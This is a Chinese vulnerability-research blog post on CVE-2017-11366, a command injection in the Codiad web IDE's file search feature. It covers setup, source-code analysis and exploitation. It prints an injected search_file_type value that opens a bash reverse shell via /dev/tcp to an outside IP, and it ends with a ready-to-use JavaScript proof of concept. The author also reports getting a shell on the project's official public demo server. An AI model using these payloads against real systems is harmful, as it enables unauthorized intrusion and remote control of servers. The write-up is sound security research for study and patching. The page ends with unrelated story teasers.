[CVE-2017-11366]Codiad 漏洞挖掘笔记 (0x01) [环境搭建以及远程命令执行]

本文首发地址 :

https://xianzhi.aliyun.com/forum/read/2000.html

先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。
先知技术社区投稿邮箱:Aliyun_xianzhi@service.alibaba.com

仓库 :

https://github.com/Codiad/Codiad

环境搭建 :

####基础环境 : 
---------------------------------------------------------------------------
PHP 7.0.20-2 (cli) (built: Jun 14 2017 05:30:04) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
    with Zend OPcache v7.0.20-2, Copyright (c) 1999-2017, by Zend Technologies
---------------------------------------------------------------------------
Server version: Apache/2.4.25 (Debian)
Server built:   2017-06-20T19:31:51

#### PHP扩展
apt install php7.0-mbstring
apt install php7.0-zip

#### PHP 配置
vim /etc/php/7.0/apache2/php.ini
zend.multibyte = On

####应用环境 : 
---------------------------------------------------------------------------
cd /var/www/html
git clone https://github.com/Codiad/Codiad.git
cd Codiad
cp config.example.php config.php
chmod o+w workspace
chmod o+w plugins
chmod o+w data
chmod o+w themes
chmod o+w config.php

问题 : 
1. 注意到这里在配置环境的时候需要给 config.php 写权限
隐隐感觉到可能会存在问题...
2. 其他可以写的目录也可能为写入 shell 提供便利

#### 创建项目
这里笔者将项目根目录放置于 : /root/pentest/
需要为这个目录赋予写权限
chmod o+w /root/pentest
在这个文件夹下面创建一个 php 文件
index.php
<?php phpinfo();?>
image.png

开始测试 :

1. 首先验证一下之前在 XMAN 中发现的命令执行漏洞是否可用
找到文件搜索功能 :
image.png
我们已经知道这个目录下面是存在文件 : index.php
<?php phpinfo();?>
直接搜索 phpinfo

抓包分析 :

image.png
image.png
image.png

白盒分析 :

# 填坑
image.png
image.png
image.png
// ./components/filemanager/controller.php
    public function search()
    {
        if (!function_exists('shell_exec')) {
            $this->status = "error";
            $this->message = "Shell_exec() Command Not Enabled.";
        } else {
            if ($_GET['type'] == 1) {
                $this->path = WORKSPACE;
            }
            $input = str_replace('"', '', $this->search_string);
            $input = preg_quote($input);
            $output = shell_exec('find -L ' . $this->path . ' -iregex  ".*' . $this->search_file_type  . '" -type f | xargs grep -i -I -n -R -H "' . $input . '"');
            $output_arr = explode("\n", $output);
            $return = array();
            foreach ($output_arr as $line) {
                $data = explode(":", $line);
                $da = array();
                if (count($data) > 2) {
                    $da['line'] = $data[1];
                    $da['file'] = str_replace($this->path, '', $data[0]);
                    $da['result'] = str_replace($this->root, '', $data[0]);
                    $da['string'] = str_replace($data[0] . ":" . $data[1] . ':', '', $line);
                    $return[] = $da;
                }
            }
            if (count($return)==0) {
                $this->status = "error";
                $this->message = "No Results Returned";
            } else {
                $this->status = "success";
                $this->data = '"index":' . json_encode($return);
            }
        }
        $this->respond();
    }

// 重点在这句 , shell_exec 执行了系统命令 , 而且参数是我们可控的
$output = shell_exec('find -L ' . $this->path . ' -iregex  ".*' . $this->search_file_type  . '" -type f | xargs grep -i -I -n -R -H "' . $input . '"');
// 可控参数有 : 
// $this->path
// $this->search_file_type
// $input
根据这三个参数向上溯源可以发现 :
image.png
image.png
image.png
image.png

可以很容易就发现 , $this->search_file_type 这个参数是直接从 POST 参数中取出来的, 并没有经过任何过滤
这样一个命令执行漏洞就已经产生了
我们来查一下 shell_exec 函数的细节 :

image.png

通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。
而通过 shell 环境执行命令是可以使用换行符号的 , 这样很容易就可以执行我们的任意命令

# 构造命令 : 
find -L /home/pentest -iregex  ".*SniperOJ"
/bin/bash -c 'sh -i >& /dev/tcp/120.24.215.80/8888 0>&1'
grep "SniperOJ" -type f | xargs grep -i -I -n -R -H "php"

也就是 search_file_type = 
SniperOJ"%0a%2Fbin%2Fbash+-c+%27sh+-i+>%26+%2Fdev%2Ftcp%2F8.8.8.8%2F8888+0>%261%27%0agrep%20"SniperOJ
image.png

记得之前测试 Codiad 的官方 Demo 的时候 , 发现在创建项目的时候是可以直接使用 git 仓库进行创建的
所以说 , Demo所在的服务器是必然可以访问互联网的
那么我们接下来如果对官方 Demo 进行测试 , 应该也是可以成功的
接下来我们测试一下官方 Demo

image.png
image.png
image.png
image.png
image.png
image.png

成功 get shell

image.png
image.png

黑盒测试问题汇总 :

1. 安装的时候似乎可以任意制定项目路径 , 但是安装完成后就不能随意指定项目路径了 , 被允许的路径有 : /home/ 以及 /var/www/
2. 官方 Demo 中虽然不允许输入绝对路径创建项目 , 但是可以使用 git 来拉取远程的仓库
3. 官方 Demo 访问 http://demo.codiad.com/i/202118236174/workspace 则会 500 错误

POC

ip="8.8.8.8";
port="8888";
$.get("/components/project/controller.php?action=get_current",function(d){p=JSON.parse(d)['data']['path'];$.post("/components/filemanager/controller.php?action=search&path="+p,{"search_file_type":"\"\n/bin/bash -c 'sh -i >&/dev/tcp/"+ip+"/"+port+" 0>&1'\ngrep \"",});});

参考资料 :

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11366

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,937评论 6 478
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,503评论 2 381
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,712评论 0 337
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,668评论 1 276
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,677评论 5 366
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,601评论 1 281
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,975评论 3 396
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,637评论 0 258
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,881评论 1 298
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,621评论 2 321
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,710评论 1 329
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,387评论 4 319
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,971评论 3 307
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,947评论 0 19
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,189评论 1 260
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,805评论 2 349
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,449评论 2 342

推荐阅读更多精彩内容